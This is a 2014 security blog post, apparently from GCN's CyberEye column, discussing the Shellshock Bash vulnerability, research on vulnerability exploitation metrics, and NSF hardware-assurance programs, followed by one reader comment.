CyberEye

Blog archive

What gives? Shellshock fails to shock

What a difference a few months can make. Shortly after the Heartbleed bug caused a panic in security circles, along comes something which could be even more serious and the reaction seems to be one big yawn.

The so-called Shellshock vulnerability is in the GNU Bourne-Again Shell (Bash), which is the command-line shell used in Linux and Unix operating systems as well as Apple’s Unix-based Mac OS X. It could allow an attacker to execute shell commands and insert malware into systems.

This is not a vulnerability in concept only. Trend Micro, which has been looking for threats based on Shellshock, has already identified a slew of them and says other common communications protocols such as HTTP, SMTP, SSH and FTP are also vulnerable.

Shellshock doubles the threat posed by the OpenSSL Heartbleed bug in various ways. Apparently servers that host OpenVPN, a widely used application, are also vulnerable to Shellshock, just as they are from Heartbleed.  Other security researchers have reported exploits. Heartbleed and Shellshock come from similar development stock. Both are faults in code used in the initial writing of programs that went unnoticed for a long time, apparently for over 20 years in the case of Shellshock. Developers then simply didn’t think of the kind of vulnerabilities today’s threat environment can use, and it’s brought the issue of open source development rigor into question.

Patches are quickly being thrown out to cope with Shellshock, just as with Heartbleed, though security organizations have warned that initial solutions don’t completely resolve the vulnerability. And, anyway, it depends on what people do with these fixes. Months after the Heartbleed bug was trumpeted in the headlines, critical systems around the world were still at risk.

Not all vulnerabilities are equal

Then again, perhaps organizations aren’t as vulnerable from Heartbleed, Shellshock and similar code-driven bugs as people think. University and industry researchers have proposed in a recent paper that existing security metrics don’t capture the extent of actual exploits.

The researchers developed several new metrics derived from actual field data and evaluated those metrics on some 300 million intrusions reported on over 6 millions hosts and found that none of the products they used in their study has more than 35 percent of their disclosed vulnerabilities exploited in the wild, and that for all the products combined only 15 percent of vulnerabilities are exploited.

“Furthermore,” the authors wrote, “the exploitation ratio and the exercised attack surface tend to decrease with newer product releases [and that] hosts that quickly upgrade to newer product versions tend to have reduced exercised attack surfaces.”

In all, they propose four new metrics that they claim, when added to existing metrics, provide a necessary measure for systems that are already deployed and working in real-world environments:

  • A count of vulnerabilities in the wild.
  • The ratio of a product’s vulnerabilities to how many of those are exploited over time.
  • A product’s attack volume, or how frequently it’s attacked.
  • The exercised attack surface, or the portion of a product’s vulnerabilities that are attacked in a given month.

These metrics, they say, could be used as part of a quantitative assessment of cyber risks and can inform the design of future security technologies.

Don’t forget the hardware

Then again, what’s the use of vulnerability announcements and security metrics, all aimed at revealing software bugs and fixes, if the hardware that hosts the software is compromised?

In times past, when chips and the systems that use them were all manufactured in the United States, or by trusted allies, that wasn’t such a concern. But with the spread of globalization comes a diversification of manufacturing sources to China and other countries and increasing fears of adversaries tampering with hardware components to make it easier for them to successfully attack U.S. systems.

That’s been the impetus behind several trusted computing initiatives in the past few years. Most recently, the National Institute of Standards and Technology developed its Systems Security Engineering initiative to try and guide the building of trustworthy systems.

The National Science Foundation is now in the game through the government’s Secure, Trustworthy, Assured and Resilient Semiconductors and Systems (STARRS) program. One approach, in concert with the Semiconductor Research Corporation (SRC), is to develop tools and techniques to make sure components have the necessary assured security from the design stage through manufacturing.

Nine initial research awards were recently made for this program, which is a part of the NSF’s $75 million Secure and Trustworthy Cyberspace “game changing” program.

While all of this is pretty broad-based, the ultimate result for government agencies could be that, in just a few years, they will be able to specify in their procurements exactly what assured hardware the computing systems they buy need to contain. 

Posted by Brian Robinson on Oct 10, 2014 at 11:52 AM


inside gcn

  • cloud migration (deepadesigns/Shutterstock.com)

    What agencies can learn from the Army’s complicated move to the cloud

Reader Comments

Tue, Oct 14, 2014 Mike Wilsher

A big yawn is right, an attacker has first to breach whatever defenses a system has firewalls, hardening, etc… The attacker must hit a weak point, generally through some other vulnerability, and could perhaps get to the shell, provided that there are not further road blocks. The default shell on a Linux, UNIX or UNIX variant is not necessarily bash, in fact sh, csh, ksh have been popular alternatives as a default. Yawn yes patch yes definitely, it should be done, recompile, with patch code (old school) bash, easy enough to do, one replace bash as an operable shell until bash is fix if their vendor doesn’t have a fix out just yet.

Please post your comments here. Comments are moderated, so they may not appear immediately after submitting. We will not post comments that we consider abusive or off-topic.

Please type the letters/numbers you see above

resources

HTML - No Current Item Deck
  • Transforming Constituent Services with Business Process Management
  • Improving Performance in Hybrid Clouds
  • Data Center Consolidation & Energy Efficiency in Federal Facilities

More from 1105 Public Sector Media Group